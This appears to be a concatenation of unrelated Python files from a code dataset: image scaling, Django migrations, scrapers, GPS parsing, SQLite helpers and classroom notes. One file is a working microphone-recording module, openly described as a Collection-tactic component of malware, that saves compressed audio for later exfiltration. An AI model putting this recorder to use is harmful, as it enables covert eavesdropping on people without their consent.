input_img: numpy array of the image
size: (width, height) for the output image
return output_img in numpy array
"""
width, height = size
old_height, old_width = input_img.shape
x_scale = float(height) / old_height
y_scale = float(width) / old_width
output_img = np.zeros((height, width), dtype=np.uint8)
for xidx in xrange(height):
old_x = float(xidx) / x_scale
for yidx in xrange(width):
old_y = float(yidx) / y_scale
if old_x.is_integer() or old_y.is_integer():
output_img[xidx, yidx] = input_img[int(old_x), int(old_y)]
else: # use bilinear interpolation
x1 = int(np.floor(old_x))
x2 = int(np.ceil(old_x)) if int(np.ceil(old_x)) < old_height else old_height - 1
y1 = int(np.floor(old_y))
y2 = int(np.ceil(old_y)) if int(np.ceil(old_y)) < old_width else old_width - 1
q11 = input_img[x1, y1]
q12 = input_img[x1, y2]
q21 = input_img[x2, y1]
q22 = input_img[x2, y2]
output_img[xidx, yidx] = (q11 * (x2 - old_x) * (y2 - old_y)
+ q21 * (old_x - x1) * (y2 - old_y)
+ q12 * (x2 - old_x) * (old_y - y1)
+ q22 * (old_x - x1) * (old_y - y1)) \
/ ((x2 - x1) * (y2 - y1) + 1e-10)
return output_img
def main():
input_img = np.array(Image.open('images/72.png').convert('L'))
sizes = [(192, 128), (96, 64), (48, 32), (24, 16), (12, 8),
(300, 200), (450, 300), (500, 200)]
for size in sizes:
output_img = scale(input_img, size)
output_img = Image.fromarray(output_img, 'L')
img_title = "images/scale_%d_%d_72.png" % size
# output_img.show()
output_img.save(img_title)
print "Successfully saved image: %s" % img_title
if __name__ == '__main__':
main()
|
24,164 | 498d7f7b98155a246cc7595d1a0e407929a95d60 | # Generated by Django 3.1.2 on 2020-11-30 00:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djangoecommerceweb', '0002_remove_product_product_image'),
]
operations = [
migrations.CreateModel(
name='Coupon',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('coupon_id', models.IntegerField()),
],
),
migrations.RemoveField(
model_name='product',
name='product_id',
),
migrations.AddField(
model_name='product',
name='product_imageUrl',
field=models.TextField(default=999),
preserve_default=False,
),
]
|
24,165 | accbe364d6c5c84011834144bf59fe5cf2a634f0 | # -*- coding: utf-8 -*-
import scrapy
from ..items import HosItem
class DataSpider(scrapy.Spider):
name = 'data'
#starting url
start_urls = ['https://el.wikipedia.org/wiki/%CE%9A%CE%B1%CF%84%CE%AC%CE%BB%CE%BF%CE%B3%CE%BF%CF%82_%CE%BD%CE%BF%CF%83%CE%BF%CE%BA%CE%BF%CE%BC%CE%B5%CE%AF%CF%89%CE%BD_%CF%84%CE%B7%CF%82_%CE%95%CE%BB%CE%BB%CE%AC%CE%B4%CE%B1%CF%82']
def parse(self, response):
items = HosItem()
table = response.css('td:nth-child(1)')
#for each row of the table
for res in table:
hospital_name = res.css('td:nth-child(1) a::text').extract()
location = res.css('td+ td a::text').extract()
items['hospital'] = hospital_name
items['location'] = location
yield items
|
24,166 | 6bc23c6262dd01430acceb631a214d3edaa05e20 | #!/usr/bin/env python3
import os, re
domaines = []
os.system("ls /var/spool/sa-exim/SAteergrube/new/ > /home/hassane/domaine")
fichier = open("/home/hassane/domaine", "r")
for ligne in fichier:
# On supprime le \n qui se trouve à la fin de la ligne
ligne = ligne.rstrip('\n')
f = open("/var/spool/sa-exim/SAteergrube/new/"+ligne, "r")
# On récupère la première ligne des fichiers de spams
while 1:
data = f.readline()
if data:
data = re.findall("([a-z0-9._-]+@[a-z0-9._-]+\.[(com|fr)]+)", data)
for i in data:
i = i.split("@")
domaine = i[1]
break
f.close()
domaines.append(domaine)
fichier.close()
nb_spam = {}
while domaines:
nb = domaines.count(domaines[0])
nb_spam[domaines[0]] = nb
i = domaines[0]
domaines = [y for y in domaines if y != i]
#print(nb_spam)
print("============================================")
print("==== Domaines ==== Nombre de spams ====")
print("============================================")
for key in nb_spam.keys():
print("==== ",key," ==== ",nb_spam[key]," ====")
print("============================================")
#print(domaines)
|
24,167 | 5d6c7b169349ec079fc815caaafe3487e1eb8a03 | import setuptools
setuptools.setup(
name="requires_wheelbroken_upper",
version="0",
install_requires=["wheelbroken", "upper"],
)
|
24,168 | cc223bebb3cb1b13f18e931900046bf7ef52896c | class HanoiMove:
"""
汉诺塔问题
把n块铁饼从杆1挪到杆2上,先把n-1块从1挪到3,然后把最后一块从1挪到2,再把n-1块从3挪到2,于是把原来n块铁饼减小成n-1块,
最后化简成挪1块的问题。
时间复杂度为2^n
"""
def __init__(self, nums=5):
"""
:param nums: 铁饼数量
"""
if not isinstance(nums, int) or nums <= 0:
raise RuntimeError('invalid nums')
self.nums = nums
# 存放每一步步骤,假设铁饼从上到下编号为1.。。。
self.steps = []
# 总共3根杆
self.staff = {1, 2, 3}
# 移动铁饼
self.move(1, 2, nums)
def move(self, mov_from, mov_to, mov_nums, top=1):
"""
把铁饼从一根杆移动到另一杆
:param mov_from: 移动前位置
:param mov_to: 移动后位置
:param mov_nums: 铁饼数量
:param top: 最上边铁饼编号
:return: None
"""
if mov_nums == 1:
# 移动1块铁饼时直接打印步骤
self.steps.append((top, mov_from, mov_to))
return
# 找到中转杆,即第三根杆
at = (self.staff - {mov_from, mov_to}).pop()
# 移动n-1块到中转杆
if mov_nums > 1:
self.move(mov_from, at, mov_nums-1)
# 移动最后一块到目标杆
self.move(mov_from, mov_to, 1, mov_nums)
# 把n-1块从中转杆移到目标杆
if mov_nums > 1:
self.move(at, mov_to, mov_nums-1)
def print_step(self):
"""
打印移动步骤
:return:
"""
print('total %d steps!' % len(self.steps))
for i, step in enumerate(self.steps):
print('%d:moving ring %d from %d to %d' % (i+1, *step))
if __name__ == '__main__':
hm = HanoiMove(8)
hm.print_step()
|
24,169 | b97f5fe1548a7a0282bf267cf7d72d2c3935f4bd | """
ICS 31 Lab 4 Problem 2
Driver: UCI_ID: 31421979 Name: Emily Lee
Navigator: UCI_ID: 18108714 Name: Estela Ramirez Ramirez
"""
def open_file(file_name:str):
if file == "Sample_Search_File.txt":
open_file = open(file_name, "r")
else:
return
for line in open_file:
return line
return file
def search_word(file_name:str, word:str)->int:
file = open("Sample_Search_File.txt", "r")
count = 0
for line in file.readlines():
x = line.split()
print(x)
for words in x:
if words.lower() == word:
count += 1
return count
file.close()
def main():
name = input("What is the name of the file, we want to open? ")
word = input("What word do you want to search for? ")
num = search_word("Sample_Search_File.txt", word)
print("The target word,",word,", occured", num, "times in the file")
if __name__=="__main__":
main()
|
24,170 | a87d7f7c609bbb8e42bf2d476f59520d33d73f08 | import math_func
import pytest
'''
Test add function tu sum variable
'''
@pytest.mark.parametrize('num1, num2, result',
[
(7, 3, 10),
('hello ', 'world', 'hello world'),
(10.5, 25.5, 36)
]
)
def test_add(num1, num2, result):
assert math_func.add(num1, num2) == result
|
24,171 | 8d2c60a37e8e71cce7a5cc4a9df63da65e8e3351 | #
# Copyright 2018 Chris Bang Sørensen, Niels Hvid, Thomas Lemqvist
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
#
# Packages to install: (pip install)
# pandas, matplotlib, xlrd, numpy
#
from exercise_nmea_data.exportkml import kmlclass
import pandas as pd # for storing data
import numpy as np # for math
from datetime import datetime as time
import datetime
import matplotlib.pyplot as plt # for plotting
import matplotlib.dates as dt
import matplotlib.lines as ln
from math import pi, cos, sqrt, sin, asin
# http://www.trimble.com/oem_receiverhelp/v4.44/en/nmea-0183messages_gga.html
# http://www.gpsinformation.org/dale/nmea.htm#GGA
class nmea_class:
def __init__(self):
self.data = []
self.df = None
self.last_t = time.strptime('1', '%d')
self.sum_dist = 0
def import_file(self, file_name):
print('Importing file: %s' % file_name)
file_ok = True
try:
# read all lines from the file and strip \n
lines = [line.rstrip() for line in open(file_name)]
except:
file_ok = False
if file_ok is True:
for i in range(len(lines)): # for all lines
if len(lines[i]) > 0 and lines[i][0] != '#': # if not a comment or empty line
csv = lines[i].split(',') # split into comma separated list
if str(csv[0]) == '$GPGGA' and len(str(csv[2])) > 0 and len(str(csv[4])) > 0:
self.data.append(csv)
self.df = pd.DataFrame(self.data, columns=list(range(0, 15)))
self.df[1] = self.df[1].apply(lambda x: self.convert_dates(x))
self.df[2] = self.df[2].apply(lambda x: self.convert_degrees(2, x))
self.df[4] = self.df[4].apply(lambda x: self.convert_degrees(3, x))
self.df[6] = self.df[6].apply(lambda x: self.convert_quality(x))
def print_data(self):
print(self.df)
def convert_dates(self, value):
t = time.strptime(str(value), '%H%M%S.%f')
if t < self.last_t:
t += datetime.timedelta(days=1)
self.last_t = t
return t
@staticmethod
def convert_degrees(deg_length, value):
deg = float(value[:deg_length])
minutes = float(value[deg_length:])
return float(deg + minutes / 60)
@staticmethod
def convert_quality(value):
quality = {0: 'invalid', 1: 'GPS fix (SPS)', 2: 'DGPS fix', 3: 'PPS fix', 4: 'RTK', 5: 'RTK float',
6: 'estimated', 7: 'Manual input', 8: 'Simulation Mode'}
val = quality[int(value)]
return val
def print_data(self):
print(self.df)
def plot_height_over_time(self):
print('plotting height over time')
fig, ax = plt.subplots()
dates = dt.date2num(self.df[1])
plt.plot(dates, self.df[9])
plt.xlabel('Time [utc]')
plt.ylabel('Height [m]')
ax.xaxis.set_major_formatter(dt.DateFormatter('%H:%M:%S'))
plt.gcf().autofmt_xdate()
plt.savefig('height_time_plot.png')
plt.show()
def plot_number_of_satellites_over_time(self):
print('plotting satellites over time')
fig, ax = plt.subplots()
dates = dt.date2num(self.df[1])
plt.plot(dates, self.df[7])
plt.xlabel('Time [utc]')
plt.ylabel('Satellites [#]')
ax.xaxis.set_major_formatter(dt.DateFormatter('%H:%M:%S'))
plt.gcf().autofmt_xdate()
plt.savefig('number_of_satellites_plot.png')
plt.show()
def great_circle_distance(self, lat1, lon1, lat2, lon2):
self.sum_dist = 2 * asin(
sqrt(((sin((lat1 - lat2) / 2)) ** 2) + cos(lat1) * cos(lat2) * ((sin((lon1 - lon2) / 2)) ** 2)))
return self.sum_dist
def plot_quality_of_signal_over_time(self):
print('plotting quality of signal over time')
mean_lat = np.mean(self.df[2])
mean_lon = np.mean(self.df[4])
self.df['dist'] = self.df.apply(
lambda row: self.great_circle_distance(mean_lat, mean_lon, row[2], row[4]) * 1000, axis=1)
print('maximum distance %.3f m' % np.max(self.df['dist']))
fig, ax = plt.subplots()
dates = dt.date2num(self.df[1])
plt.plot(dates, self.df['dist'])
plt.xlabel('Time [utc]')
plt.ylabel('Deviation [M]')
ax.xaxis.set_major_formatter(dt.DateFormatter('%H:%M:%S'))
plt.gcf().autofmt_xdate()
plt.savefig('quality_of_signal_plot.png')
plt.show()
def plot_track(self):
print('plotting track')
fig, ax = plt.subplots()
plt.plot(self.df[4], self.df[2])
ax.ticklabel_format(useOffset=False)
plt.xlabel('Longitude')
plt.ylabel('Latitude')
plt.savefig('track_plot.png')
plt.show()
def export_kml(self):
print('Creating the file export.kml')
# width: defines the line width, use e.g. 0.1 - 1.0
kml = kmlclass()
kml.begin('export.kml', 'Example', 'Example on the use of kmlclass', 0.1)
# color: use 'red' or 'green' or 'blue' or 'cyan' or 'yellow' or 'grey'
# altitude: use 'absolute' or 'relativeToGround'
kml.trksegbegin('', '', 'red', 'absolute')
for i, x in self.df.iterrows():
kml.trkpt(x[2], x[4], x[9])
kml.trksegend()
kml.end()
if __name__ == "__main__":
# nmea = nmea_class()
# nmea.import_file('nmea_trimble_gnss_eduquad_flight.txt')
# nmea.print_data()
# nmea.plot_height_over_time()
# nmea.plot_number_of_satellites_over_time()
# nmea.plot_track()
# nmea.export_kml()
nmea = nmea_class()
nmea.import_file('nmea_ublox_neo_24h_static.txt')
nmea.print_data()
nmea.plot_quality_of_signal_over_time()
|
24,172 | 317bc0e592ab2d1fa26f8fd7333142a494c695a7 | ##############################################################################
#
# Copyright (C) 2011 - 2013 Therp BV (<http://therp.nl>).
# Copyright (C) 2011 Smile (<http://smile.fr>).
# All Rights Reserved
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Direct Debit',
'version': '7.0.2.134',
'license': 'AGPL-3',
'author': ['Therp BV', 'Smile'],
'website': 'https://launchpad.net/banking-addons',
'category': 'Banking addons',
'depends': ['account_banking_payment_export'],
'data': [
'view/account_payment.xml',
'view/account_invoice.xml',
'view/payment_mode.xml',
'view/payment_mode_type.xml',
'workflow/account_invoice.xml',
'data/account_payment_term.xml',
],
'description': '''
This module adds support for direct debit orders, analogous to payment orders.
A new entry in the Accounting/Payment menu allow you to create a direct debit
order that helps you to select any customer invoices for you to collect.
This module explicitely implements direct debit orders as applicable
in the Netherlands. Debit orders are advanced in total by the bank.
Amounts that cannot be debited or are canceled by account owners are
credited afterwards. Such a creditation is called a storno. This style of
direct debit order may not apply to your country.
This module depends on and is part of the banking addons for OpenERP. This set
of modules helps you to provide support for communications with your local
banking institutions. The banking addons are a continuation of Account Banking
Framework by Edusense BV. See https://launchpad.net/banking-addons.
''',
'installable': True,
}
|
24,173 | 26ccab58cc4f7f3ad93201aec60fadeb7f0c46cf | import socket
import sys
import select
a = sys.argv
if len(a) != 2:
print("NO TEXT FILE GIVEN OR TOO MANY PARAMETERS")
quit()
d = 0.1
f = None
try:
f = open(a[1], "r")
except:
print("INVALID TEXT FILE")
quit()
data = f.read()
data = data.splitlines()
arr = []
end = len(data)
if len(data) > 7:
end = 7
for i in range(0,end):
arr.append(data[i].split())
serverAddressPort = ("127.0.0.1", 65432)
bufferSize = 1024
if len(arr) < 7:
print("INVALID TEXT FILE: AT LEAST 7 LINES NEEDED")
quit()
for i in arr:
if len(i) != 3:
print("INVALID TEXT FILE: A LINE DOES NOT CONTAIN EXACTLY 3 VALUES")
quit()
i = 0
while i <= 6:
# print(i, d)
UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
temp = str(arr[i][0]) + " " + str(arr[i][1]) + " " + str(arr[i][2])
UDPClientSocket.sendto(temp.encode(), serverAddressPort)
UDPClientSocket.settimeout(d)
restart = False
passBy = False
try:
data = UDPClientSocket.recvfrom(bufferSize)
except:
# print(temp)
d = 2*d
if d>2:
print("ERROR: FAILURE SERVER IN TROUBLE... " + str(arr[i][1]) + " " + str(arr[i][0]) + " " + str(arr[i][2]) + " NOT CALCULATED")
passBy = True
else:
print("ERROR: WAITTIME | REATTEMPTING REQUEST...")
restart = True
if restart:
continue
if not passBy:
data = data[0]
data = data.decode()
if data[0:3] == "200":
cur = (data[5:len(data)])
print("The result of " + str(arr[i][1]) + " " + str(arr[i][0]) + " " + str(arr[i][2]) + " is " + cur)
else:
print("ERROR: " + str(arr[i][1]) + " " + str(arr[i][0]) + " " + str(arr[i][2]) + " is an INVALID INPUT")
UDPClientSocket.close()
i+=1
|
24,174 | 239b83d8bd4ce2cd1eefbba2ae7eb6ecc7e577bd | import pyaudio
import audioop
from os import path
# This module implements the Audio Capture technique (under the Collection tactic).
# The module captures the audio using a simple & default API called MME, which is found on most/all Windows machines.
# The module then compresses the audio to ADPCM encoding to save space on the target machine.
# The files can be later sent to a remote C2 server, then extracted back to linear PCM and played.
# Some restrictions:
# 1) The module is intended to be used on a Windows machine with the default MME API.
# 2) However, it is just a few lines of code away from working with Linux/Mac, thanks to the PyAudio library.
# 3) The module is potentially a part of a bigger malware that invokes audio grabs on demand then sends them out.
class Recorder:
RATE = 44100
ADPCM_OUTPUT_FILENAME = "output.adpcm"
def __init__(self, duration=5):
self.duration = duration
self.stream = None
self.audio = pyaudio.PyAudio()
self.format = pyaudio.paInt32
self.sample_size = self.audio.get_sample_size(self.format)
self.channels = 2
def attack(self):
self.assert_preconditions()
self.record()
res = self.assert_postconditions()
self.cleanup()
return res
# Make sure the MME API and 1 input device are available
def assert_preconditions(self):
device = self.audio.get_default_input_device_info()
if self.get_host_api_name_of_device(device) == 'MME':
self.channels = min(device.get('maxInputChannels'), self.channels)
else:
raise RuntimeError("MME API not detected")
def get_host_api_name_of_device(self, device):
return self.audio.get_host_api_info_by_index(device['hostApi'])['name']
def record(self):
self.open_stream()
frames = self.read_stream()
self.close_stream()
self.write(self.compress(frames))
def open_stream(self):
self.stream = self.audio.open(format=self.format, channels=self.channels,
rate=self.RATE, input=True, frames_per_buffer=self.sample_size)
def read_stream(self):
frames = []
for i in range(0, int(self.RATE / self.sample_size * self.duration)):
frames.append(self.stream.read(self.sample_size))
return frames
def close_stream(self):
self.stream.stop_stream()
self.stream.close()
self.audio.terminate()
def compress(self, frames):
state = (None, None)
for frame in frames:
state = audioop.lin2adpcm(frame, self.sample_size, state[1])
yield state[0]
def write(self, compressed):
with open(self.ADPCM_OUTPUT_FILENAME, 'wb') as f:
f.write(b''.join(compressed))
# Check if the file exists and whether it's in the correct size
def assert_postconditions(self):
try:
bytes_per_second = self.RATE * self.sample_size * self.channels / 8 # divided by 8 for compression
return path.getsize(self.ADPCM_OUTPUT_FILENAME) >= bytes_per_second * self.duration
except FileNotFoundError:
return False
def cleanup(self):
pass # In context of a full malware, the output file will be deleted only after sending the data out
recorder = Recorder()
print(recorder.attack())
|
24,175 | 5d593ae5ee06fd7108bb4d28f7ce2a384ca156ad | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-04-29 03:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('cabbooking', '0007_cabregisteration_registervehicle'),
]
operations = [
migrations.CreateModel(
name='CabRegister',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('agency_name', models.CharField(max_length=200, verbose_name='Agency Name')),
('full_name', models.CharField(max_length=200, verbose_name='Full Name')),
('mobile_no', models.CharField(max_length=200, verbose_name='Mobile No')),
('email_id', models.CharField(max_length=200, verbose_name='Email Id')),
('bank_name', models.CharField(max_length=200, verbose_name='Bank Name')),
('account_no', models.CharField(max_length=200, verbose_name='Account No')),
('name_in_account', models.CharField(max_length=200, verbose_name='Account Name')),
('ifsc_code', models.CharField(max_length=200, verbose_name='IFSC Code')),
('branch', models.CharField(max_length=200, verbose_name='Branch')),
('address', models.TextField(verbose_name='Address')),
],
options={
'verbose_name': 'Cab Registeration',
'verbose_name_plural': 'Cab Registerations',
},
),
migrations.AlterField(
model_name='registervehicle',
name='cabregister',
field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='cabbooking.CabRegister'),
),
migrations.DeleteModel(
name='CabRegisteration',
),
]
|
24,176 | 7b0a64c90ed270a72b04da556ebb8bcabfac735e | from collections import defaultdict
import itertools
from typing import (
Union,
List,
Tuple,
DefaultDict,
Generator,
)
from .exceptions import InvalidTableConfiguration
from .column import SQLiteColumn
from .enums import SQLiteConstraint
from .utils import SQLiteTemplate
class SQLiteTable(object):
schema_template = SQLiteTemplate(
'CREATE TABLE $exists $table_name ($column_defs)'
)
unique_template = SQLiteTemplate('UNIQUE ($fields)')
trigger_template = SQLiteTemplate(
'CREATE TRIGGER $trigger_name $when $event ON $table_name BEGIN $expr; END'
)
def __init__(
self,
table_name: str,
columns: Union[List[SQLiteColumn], Tuple[SQLiteColumn], tuple] = (),
unique_together: Union[Tuple[str], Tuple[Tuple], Tuple] = (),
raise_exists_error: bool = False,
):
self.table_name = table_name
self.columns = {column.column_name: column for column in columns}
self.unique_together = unique_together
self.raise_exists_error = raise_exists_error
self.foreign_key_columns = filter(lambda x: x.is_foreign_key, columns)
try:
self.primary_key_col = list(
filter(lambda x: x.is_primary_key, self.columns.values())
)[0]
except IndexError:
self.primary_key_col = None
def __repr__(self) -> str:
template = (
'{!s}({!r}, columns={!r}, unique_together={!r}, raise_exists_error={!r})'
)
return template.format(
self.__class__.__name__,
self.table_name,
tuple(self.columns.values()),
self.unique_together,
self.raise_exists_error,
)
def __str__(self) -> str:
return '<{!s}: {!r}>'.format(self.__class__.__name__, self.table_name)
def get_primary_key_col_name(self) -> str:
if self.primary_key_col is not None:
return self.primary_key_col.column_name
return 'rowid'
def validate_columns(self) -> None:
if len(self.columns.keys()) == 0:
raise InvalidTableConfiguration('Cannot create table without columns')
def get_unique_constraints_sql(self) -> Union[Generator, tuple]:
try:
if isinstance(self.unique_together[0], str):
unique_sets: Tuple = (self.unique_together,)
else:
unique_sets = self.unique_together
except IndexError:
return ()
return (
self.unique_template.substitute(fields=', '.join(x)) for x in unique_sets
)
def get_foreign_key_constraints_sql(self) -> Generator:
return (x.fk_constraint_to_sql() for x in self.foreign_key_columns)
def get_column_defs_sql(self) -> str:
return ', '.join(
itertools.chain(
(x.definition_to_sql() for x in self.columns.values()),
self.get_foreign_key_constraints_sql(),
self.get_unique_constraints_sql(),
)
)
def get_schema_definition_subs(self) -> dict:
self.validate_columns()
substitutions: DefaultDict[str, str] = defaultdict(str)
substitutions['table_name'] = self.table_name
substitutions['column_defs'] = self.get_column_defs_sql()
if not self.raise_exists_error:
substitutions['exists'] = SQLiteConstraint.IF_NOT_EXISTS.value
return substitutions
def schema_to_sql(self) -> str:
return self.schema_template.substitute(self.get_schema_definition_subs())
def triggers_to_sql(self) -> Generator:
for column in filter(lambda x: x.requires_trigger(), self.columns.values()):
expr_template = SQLiteTemplate(column.trigger_expression_to_sql())
substitutions = {
'expr': expr_template.substitute(
{
'primary_key_col': self.get_primary_key_col_name(),
'table_name': self.table_name,
},
),
'trigger_name': f'{self.table_name}_{column.column_name}_update',
'when': 'AFTER',
'event': 'UPDATE',
'table_name': self.table_name,
}
yield self.trigger_template.substitute(substitutions)
|
24,177 | e2fe237f5c6f6b3f04660277f7ce3235356a0300 | # -*- coding:UTF-8 -*-
import scrapy
from housetype.items import HousetypeItem
from scrapy.http.request import Request
from scrapy.selector import Selector
import urlparse
def printhxs(hxs):
a=''
for i in hxs:
a=a+i.encode('utf-8')
return a
def change_image(images):
new_image=[]
for i in images:
new_image.append(i.split('_cm')[0]+i[-13:])
return new_image
def get_urls(startpage,endpage):
urls_list = []
for x in range(endpage-startpage):
urls_list.append("http://house.leju.com/zh/search/?page="+str(x+startpage))
return urls_list
class MySpider(scrapy.Spider):
name = "house"
download_delay = 1
allowed_domains = ["house.leju.com"]
# start_urls = [
# "http://house.leju.com/zh/search/?page=1"
# ]
start_urls=get_urls(11,440)
def parse_item(self, response):
sel = Selector(response)
item = HousetypeItem()
item['page'] = response.request.url.split('/p')[1].split('.shtml')[0]
item['name'] = ''.join(sel.xpath('//div[@class="title"]/h1/text()').extract())
item['image_url'] = change_image(sel.xpath('//div[@class="b_imgBox"]/img/@lsrc').extract())
item['layout'] = sel.xpath('//div[@class="b_imgBox"]/img/@alt').extract()
yield item
def parse_pages(self, response):
sel = Selector(response)
pages = sel.xpath('//div[@class="b_pageBox clearfix z_pages"]/a/@href').extract()
if pages:
new_pages=list(set(pages))
new_pages.sort
for page_url in new_pages:
yield Request(page_url ,callback=self.parse_item)
else:
item = HousetypeItem()
item['page'] = '1'
item['name'] = ''.join(sel.xpath('//div[@class="title"]/h1/text()').extract())
item['image_url'] = change_image(sel.xpath('//div[@class="b_imgBox"]/img/@lsrc').extract())
item['layout'] = sel.xpath('//div[@class="b_imgBox"]/img/@alt').extract()
yield item
def parse_layout(self, response):
for sel in response.xpath('//div[@class="clearfix"]'):
myurl = 'http://house.leju.com/'
urls = printhxs(sel.xpath('ul/li/a/@href').extract())
huxing = printhxs(sel.xpath('ul/li/a/text()').extract())
if ("户型图" in huxing):
layout_url = myurl + urls.split('/')[1] + "/huxing/"
yield Request(layout_url ,callback=self.parse_pages)
def parse(self, response):
sel = response.xpath('//div[@id="ZT_searchBox"]')
house_url = sel.xpath('div/div/a/@href').extract()
for urls in house_url:
yield Request(urls ,callback=self.parse_layout)
|
24,178 | 8754a0417199f06bf96a2eb2d778db4b8eed1bc0 | from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.parsers import JSONParser
from roomChatBackend.serializers import UserSerializers
from rest_framework import status
class SignUp(APIView):
def post(self,request,format=None):
resp=UserSerializers(data=request.data)
if resp.is_valid():
resp.save()
return Response(resp.data,status=status.HTTP_201_CREATED)
else:
return Response(resp.errors, status=status.HTTP_400_BAD_REQUEST)
|
24,179 | e04baa30fd1bcaa00e3df94e0d4c835311450534 | # Intro to Cloudshell
## A virtual computer you get access to for free with a google account
## You get files and a terminal
### Do a quick tour of the parts
# Terminal - Bash
## The programming language of the terminal is called `bash` and most of its commands are abbreviations or acronyms.
# PWD - first command print working directory
## This command tells us where we are in the file system. It's called the working directory
# CHATSTORM - What are the ways you interact with the files and folders on a computer? open folders, files, make files, make folders, click inside of folders, etc.
#LS - abbreviation for list
## WATERFALLL - How can you tell difference between a file and a folder when looking at output of ls
#Making a directory (do this first so students can then cd into it and then make files there in an organized way)
## mkdir <directory_name>
## Let's make a directory called FintechFocus2021
#Change directory - cd <directory_path>
## Let's change into this new directory cd FintechFocus2021 and check the new working directory
## Waterfall - Copy and paste the output of pwd after cd'ing to FintechFocus2021 (if all students have the correct output, we are good to go!)
#Let's make another directory inside of the folder. Each day we will make a new directory for that day and include the day number.
## Make a new directory called 'day01' and CD into it. (take 30 seconds)
#Making files
## We'll use the command touch to create new files. We can list multiple file names w/ file extensions and make them simultaneously.
## Mini-challenge in breakout rooms: In your day01 folder, make a folder called "myFirstWebsite" and create a index.html style.css and script.js inside that new folder. Use ls and pwd to verify your work.
### Opening files
#### To open files available in your current working directory (use ls to see whats available) you'll use the command cloudshell open <file>.
### Check for time....removing and moving files and folders might be more beneficial as a full stretch where students look up how to do on their own. https://www.learnenough.com/command-line-tutorial/manipulating_files#sec-renaming_copying_deleting
## Possibly state that we can also move, delete, and rename files and folders.
# cp (copy) rm (remove/delete) mv (move)
##First Lab
### Framing: We're going to work on our first lab now. Labs is where the *real* learning happens where you will work closely with your classmates to reinforce concepts and solve challenges.
### To get the lab in your cloudshell, we will use git. We'll talk in more detail later on what git is and how we will use it for our own, original code, but for our purposes right now we will use this workflow. You'll cd into the directory of the day (in this case, day01) and you will run shared code that looks like 'git clone <url>' and then cd into that newly copied directory. Labs will include a readme file with directions and code for you to work with.
### During class, labs will take place in breakout rooms in pairs. When you get into the breakout room, decide who will be the driver (does the typing) and who will be the navigator (tells the driver what to type). Both students can contribute ideas on how to solve the challenge at hand. During labs, you will use a slack DM to exchange code back and forth for when you swap driver/navigator. Swapping driver/navigator should happen every 4-5 minutes (about two songs worth).
### In your breakout room, you can click a button to ask for help and one of us will be able to pop into your room. We can also broadcast messages to all of the rooms too. When we're in breakout rooms, use slack to send us messages.
### Most of the labs are designed in a way where there will always be more fun to be had in challenges than we will have the time for. The goal for no lab is for you to complete it! But if you do happen to complete a lab, we will always have extra fun additional labs for you to work.
### Okay, so here's the code for our first lab 'git clone https://github.com/upperlinecode/command-line-hidden-treasure.git'
### When you get to your breakout room, introduce yourself again, tell your partner your favorite color, give them a digital high five and have fun coding! |
24,180 | 8ad89dda2ee89cdffeb629d7d0f83565c1960f2c | class Solution:
# @param A : list of integers
# @param B : integer
# @return a list of list of integers
def fourSum(self, A, B):
ans_dict = {}
ans = []
A.sort()
#print(A)
for i in range(len(A)):
for j in range(i+1, len(A)):
sum_remain = B - A[i] - A[j]
k = j + 1
l = len(A) - 1
while k < l:
s = A[k] + A[l]
if s == sum_remain:
if (A[i],A[j],A[k],A[l]) not in ans_dict:
ans_dict[(A[i],A[j],A[k],A[l])] = 1
ans.append([A[i],A[j],A[k],A[l]])
k += 1
l -= 1
elif s < sum_remain:
k += 1
else:
l -= 1
return ans
|
24,181 | 6712df3f4dffee3c433b5ef0f31d02fe87be2446 | #pip install selenium
#pip install keyboard
from selenium import webdriver
#Download Chrome Driver With Respect To Your Chrome Browser's Version For Checking the version of chrome.go to the following site chrome://version
from time import sleep
from selenium.webdriver.common.keys import Keys
import keyboard
driver = webdriver.Chrome("#Path Of The Chromedriver")
